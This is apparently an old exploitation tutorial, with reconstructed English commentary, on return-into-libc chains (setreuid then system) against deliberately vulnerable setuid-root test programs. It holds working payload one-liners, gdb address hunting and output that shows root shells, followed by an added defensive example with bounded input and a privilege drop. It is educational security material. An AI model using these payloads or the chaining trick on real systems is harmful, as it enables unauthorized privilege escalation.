==================================================
OMEGA Project and setuid
2002/09/17
hackerleon in Null@Root
leon@null2root.org
==================================================

Note: the Korean prose of this paper did not survive the character encoding of this copy. The English commentary between the listings below is reconstructed from the fragments that are still readable, the commands, and the program output; the listings themselves are reproduced as they appear.

0x00 OMEGA
----------------

The OMEGA Project is a technique for exploiting a program in an environment where injected code cannot be executed. Because the system library is loaded into every program, the location of system() can be found; if the saved return address (RET) is overwritten with the address of system(), the exploit needs neither shellcode nor the address of injected code, since the address of a "/bin/sh" string is all that is passed.

0x01 getuid
----------------

On Linux kernel 2.4.x and later, a setuid program that executes another program (in particular a shell) gets its privileges checked: the shell calls getuid(), and when the real uid differs from the effective uid it runs with the user's uid. When shellcode is used this is solved by placing setreuid code in front of the shellcode, but an exploit that uses no code of its own (a race condition, an environment-variable trick, or an OMEGA-style return into libc) runs into exactly this problem.

    //test1.c
    #include <string.h>

    int main(int argc, char *argv[])
    {
        char buf[16];               /* 16-byte stack buffer */
        if (argc > 1)
            strcpy(buf, argv[1]);   /* unbounded copy: the overflow used below */
        return 0;
    }

    $ ls -l test1
    -rwsr-xr-x    1 root     root        14491 Sep 17 11:49 test1
    $ id
    uid=500(leon) gid=500(leon)

The program is exploited with OMEGA on kernel 2.4.x or later:

    $ gdb test1
    (gdb) b main
    Breakpoint 1 at 0x8048466
    (gdb) r
    Starting program: /home/leon/study/test1

    Breakpoint 1, 0x08048466 in main ()
    (gdb) x/x $ebp
    0xbffffb08:     0xbffffb48
    (gdb) x/x system
    0x4006c584 <__libc_system>:     0x57e58955
    (gdb) x/s system+908184
    0x4014a120 <__clz_tab+2155>:     "/bin/sh"    <----------- finding "/bin/sh" as in the lamagra exploit

    $ perl -e 'system "./test1","AAAAAAAAAAAAAAAAAAAA\x84\xc5\x06\x40\x41\x41\x41\x41\x20\xa1\x14\x40"'
    sh-2.05$ id
    uid=500(leon) gid=500(leon)

As shown, RET was redirected into system() with "/bin/sh" as its argument, but the shell called getuid() and we got a shell with our own uid.

0x02 setuid
-------------------

Looking at the program flow: when RET points at system(), the word 4 bytes after it is where system() expects the return address of its call, and the argument follows after that. That is how the run above worked. So what happens if setreuid() is called before system()? The layout to try is

    [buf][ebp][*setreuid][*system][UID][*/bin/sh]

    $ gdb test1
    (gdb) b main
    Breakpoint 1 at 0x80486d6
    (gdb) r
    Starting program: /home/leon/study/test1

    Breakpoint 1, 0x080486d6 in main ()
    (gdb) x/x system
    0x4006c584 <__libc_system>:     0x57e58955
    (gdb) x/x setreuid
    0x40103db4 <__setreuid>:        0x56e58955
    (gdb)

    $ perl -e 'system "./test1","AAAAAAAAAAAAAAAAAAAA\xb4\x3d\x10\x40\x84\xc5\x06\x40\x01\x01\x01\x01\x20\xa1\x14\x40"'
    sh-2.05$ id
    uid=16843009 gid=500(leon)

Hex 0x01010101 is 16843009 in decimal, so the uid really was changed by setreuid(). This confirms that to get uid=0 the argument has to be the hex word 0x00000000.

    $ perl -e 'system "./test1","AAAAAAAAAAAAAAAAAAAA\xb4\x3d\x10\x40\x84\xc5\x06\x40\x00\x00\x00\x00\x20\xa1\x14\x40"'
    Segmentation fault

The program takes its input through strcpy(), and strcpy() stops at the byte 0x00: the string is terminated there and the rest of the layout never reaches the stack (compare the terminator canary of StackGuard). So with input copied by strcpy() we cannot obtain uid=0 this way.

0x03 input functions
----------------------

    //test2.c
    #include <stdio.h>

    int main(void)
    {
        char buf[16];               /* 16-byte stack buffer */
        scanf("%s", buf);           /* unbounded read: stops at whitespace, not at NUL */
        return 0;
    }

    $ ls -l test2
    -rwsr-xr-x    1 root     root        11391 Sep 17 11:51 test2

What if the input goes through scanf() rather than strcpy()? One detail first: the library "/bin/sh" sits at 0x4014a120, and the byte 0x20 (a space) terminates scanf() input, so "/bin/sh" is placed on the stack instead and its stack address is used:

    [buf][ebp][*setreuid][*system][0x00][*/bin/sh][junk][/bin/sh]

    $ (printf "AAAAAAAAAAAAAAAAAAAA\xb4\x3d\x10\x40\x84\xc5\x06\x40\x00\x00\x00\x00\x10\xfb\xff\xbf\x41\x41\x41\x41/bin/sh";cat)|./test2
    0xbffffae8  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
    0xbffffaf8  41 41 41 41 b4 3d 10 40 84 c5 06 40 00 00 00 00   AAAA.=.@...@....
    0xbffffb08  10 fb ff bf 41 41 41 41 2f 62 69 6e 2f 73 68 00   ....AAAA/bin/sh.
    id
    uid=0(root) gid=0(root)

uid=0 obtained. Because scanf() passes NUL bytes through, uid=0 is reachable. Note that the call is not setuid(0) but setreuid(UID, UID), so the UID word is placed once more at the position before the "/bin/sh" pointer, and "/bin/sh" itself is supplied in the input because the library copy cannot be used here. The test shows that when the input function accepts NUL bytes, the setuid privilege can be obtained this way; when the input is copied with strcpy(), the NUL byte cannot be copied and this does not work ...... BUT ~~~~ ^^

0x04 uid=0 with strcpy() after all!!!
---------------------------

It is not really over. Look at test1's memory after the overflow (dumpcode.h is a small hex-dump helper):

    //test1.c
    #include <string.h>
    #include "dumpcode.h"

    int main(int argc, char *argv[])
    {
        char buf[16];
        if (argc > 1)
            strcpy(buf, argv[1]);   /* unbounded copy, as before */
        dumpcode(buf, 64);          /* dump 64 bytes starting at buf */
        return 0;
    }

    $ ./test1 AAAA
    0xbffffae8  41 41 41 41 00 84 04 08 94 97 04 08 9c 98 04 08   AAAA............
    0xbffffaf8  38 fb ff bf 07 95 03 40 02 00 00 00 64 fb ff bf   8......@....d...
    0xbffffb08  70 fb ff bf 42 83 04 08 40 87 04 08 00 00 00 00   p...B...@.......
    0xbffffb18  38 fb ff bf f1 94 03 40 00 00 00 00 70 fb ff bf   8......@....p...

Look closely: after RET there are words of 00 00 00 00 already sitting on the stack. Could one of these be used for the uid=0 we want? We know that calling setreuid() before system() works; the only missing piece is the 0x00000000 argument. A library function called through RET takes its argument from the word after its return-address slot, so if the chain is arranged so that setreuid() is entered exactly where such a 00 00 00 00 word sits in the argument position, setreuid(0, ...) and then system() should run. To walk down the stack to that position we call printf().

    $ gdb test1
    (gdb) b main
    Breakpoint 1 at 0x80486d6
    (gdb) r
    Starting program: /home/leon/study/test1
    /bin/bash: /root/.bashrc: Permission denied

    Breakpoint 1, 0x080486d6 in main ()
    (gdb) x/x system
    0x4006c584 <__libc_system>:     0x57e58955
    (gdb) x/x setreuid
    0x40103db4 <__setreuid>:        0x56e58955
    (gdb) x/x printf
    0x4007cd04 <printf>:            0x53e58955
    (gdb)

... first the first 00 00 00 00 ...

    $ perl -e 'system "./test1","AAAAAAAAAAAAAAAAAAAA\x04\xcd\x07\x40\x04\xcd\x07\x40\x04\xcd\x07\x40\x04\xcd\x07\x40\xb4\x3d\x10\x40\x84\xc5\x06\x40"'
    0xbffffac8  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
    0xbffffad8  41 41 41 41 04 cd 07 40 04 cd 07 40 04 cd 07 40   AAAA...@...@...@
    0xbffffae8  04 cd 07 40 b4 3d 10 40 84 c5 06 40 00 00 00 00   ...@.=.@...@....
    0xbffffaf8  18 fb ff bf f1 94 03 40 00 00 00 00 50 fb ff bf   .......@....P...
    $

... that one does not work ... never mind, next ... now the second 00 00 00 00:

    $ perl -e 'system "./test1","AAAAAAAAAAAAAAAAAAAA\x04\xcd\x07\x40\x04\xcd\x07\x40\x04\xcd\x07\x40\x04\xcd\x07\x40\x04\xcd\x07\x40\x04\xcd\x07\x40\x04\xcd\x07\x40\xb4\x3d\x10\x40\x84\xc5\x06\x40"'
    0xbffffab8  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
    0xbffffac8  41 41 41 41 04 cd 07 40 04 cd 07 40 04 cd 07 40   AAAA...@...@...@
    0xbffffad8  04 cd 07 40 04 cd 07 40 04 cd 07 40 04 cd 07 40   ...@...@...@...@
    0xbffffae8  b4 3d 10 40 84 c5 06 40 00 00 00 00 40 fb ff bf   .=.@...@....@...
    sh: ?E??E :command not found

Ah!!! It worked: system() was called, only its argument is whatever bytes happened to be there. So, since system() searches PATH, first add the current directory to PATH and then create a file with that garbage name:

    $ PATH=$PATH:./
    $ perl -e 'system "./test1","AAAAAAAAAAAAAAAAAAAA\x04\xcd\x07\x40\x04\xcd\x07\x40\x04\xcd\x07\x40\x04\xcd\x07\x40\x04\xcd\x07\x40\x04\xcd\x07\x40\x04\xcd\x07\x40\xb4\x3d\x10\x40\x84\xc5\x06\x40"' 2> file
    $ ./lnk file    <---------- lnk is a program from lamagra; it creates a file named after the contents of the given file.
    filename = j???????
    $ perl -e 'system "./test1","AAAAAAAAAAAAAAAAAAAA\x04\xcd\x07\x40\x04\xcd\x07\x40\x04\xcd\x07\x40\x04\xcd\x07\x40\x04\xcd\x07\x40\x04\xcd\x07\x40\x04\xcd\x07\x40\xb4\x3d\x10\x40\x84\xc5\x06\x40"'
    # id
    uid=0(root) gid=500(leon)

Done ...^^ Which of the 00 00 00 00 words after RET is the one that lands in the argument slot can be checked from the dump. With the layout

    [buf][ebp][printf1][printf2][printf...][setreuid][system]

uid=0 is obtained. So we have seen that with OMEGA the getuid() check of the system can be bypassed and the setuid privilege obtained. If anything here is wrong, mail leon@null2root.org.

_eof
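Appendix (added example; this is not code from hackerleon's paper or from the OMEGA Project). The paper turns on two properties of the test programs: strcpy() stops at the first NUL while scanf("%s") stops only at whitespace, and the setuid binary never drops its privilege itself but leaves that to the shell's getuid() check. The C program below measures the first property on a constructed input and shows the bounded-copy and privilege-drop pattern that removes both. The function names (strcpy_would_copy, scanf_would_consume, copy_bounded, read_line_bounded, drop_privileges) are this example's own; it assumes Linux with glibc (fmemopen, setresuid, setresgid).

```c
/* Added example, not part of the original paper.  Compares the two input
 * paths the paper uses and shows a hardened setuid program skeleton.
 * Assumes Linux/glibc. */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

/* Constructed sample input: 16 bytes, an embedded NUL, 4 more bytes, then a
 * space.  Test data made up for this example. */
static const char sample[] = "AAAAAAAAAAAAAAAA\0BBBB tail";
#define SAMPLE_LEN (sizeof(sample) - 1)   /* 26 bytes, embedded NUL included */

/* Bytes strcpy(buf, sample) would copy: it stops at the first NUL, which is
 * why a 0x00000000 word could not be delivered through test1's argv. */
size_t strcpy_would_copy(const char *src)
{
    return strlen(src);                    /* 16 for sample */
}

/* Bytes scanf("%s") consumes from the same data: %s stops at whitespace,
 * not at NUL, so the embedded NUL is stored and reading continues to the
 * space.  That is what let test2 receive a 0x00000000 word. */
size_t scanf_would_consume(const char *src, size_t len)
{
    FILE *in = fmemopen((void *)src, len, "r");
    char buf[64];
    int consumed = 0;
    if (in == NULL)
        return 0;
    if (fscanf(in, "%63s%n", buf, &consumed) != 1)
        consumed = 0;
    fclose(in);
    return (size_t)consumed;               /* 21 for sample */
}

/* Hardened replacement for strcpy(buf, argv[1]): refuses input that does
 * not fit instead of overrunning the buffer.  Returns 0 on success, -1 if
 * src plus its terminator does not fit in dst. */
int copy_bounded(char *dst, size_t dst_size, const char *src)
{
    size_t n = strlen(src);
    if (dst_size == 0 || n >= dst_size)
        return -1;
    memcpy(dst, src, n + 1);
    return 0;
}

/* Hardened replacement for scanf("%s", buf): fgets() is bounded and the
 * newline is stripped.  Returns 0 on success, -1 on EOF/error or when the
 * line did not fit (the rest of that line is discarded, never written). */
int read_line_bounded(char *dst, size_t dst_size, FILE *in)
{
    if (fgets(dst, (int)dst_size, in) == NULL)
        return -1;
    size_t n = strlen(dst);
    if (n > 0 && dst[n - 1] == '\n') {
        dst[n - 1] = '\0';
        return 0;
    }
    if (n == dst_size - 1) {               /* buffer full, no newline: too long */
        int c;
        while ((c = fgetc(in)) != EOF && c != '\n')
            ;
        return -1;
    }
    return 0;                              /* final line without a newline */
}

/* Drop the setuid privilege permanently before anything that could run a
 * shell.  The paper's chain works because the program never does this and
 * relies on /bin/sh noticing uid != euid.  Returns 0 on success. */
int drop_privileges(void)
{
    uid_t ruid = getuid();
    gid_t rgid = getgid();
    if (setresgid(rgid, rgid, rgid) != 0)
        return -1;
    if (setresuid(ruid, ruid, ruid) != 0)
        return -1;
    /* A real drop is irreversible: regaining euid 0 must fail. */
    if (ruid != 0 && seteuid(0) == 0)
        return -1;
    return 0;
}

int main(int argc, char *argv[])
{
    char buf[16];
    printf("strcpy copies %zu bytes, scanf(\"%%s\") consumes %zu bytes\n",
           strcpy_would_copy(sample), scanf_would_consume(sample, SAMPLE_LEN));
    if (drop_privileges() != 0)
        return 1;
    if (argc > 1 && copy_bounded(buf, sizeof buf, argv[1]) != 0) {
        fputs("argument too long\n", stderr);
        return 1;
    }
    return 0;
}
```

Run without arguments it reports 16 bytes for the strcpy() path and 21 for the scanf() path on the sample; run with a 20-byte argument, as in the paper's payloads, it refuses the input instead of overwriting RET. The privilege drop happens before any argument is looked at, so even a remaining bug would give an attacker the real uid, not root.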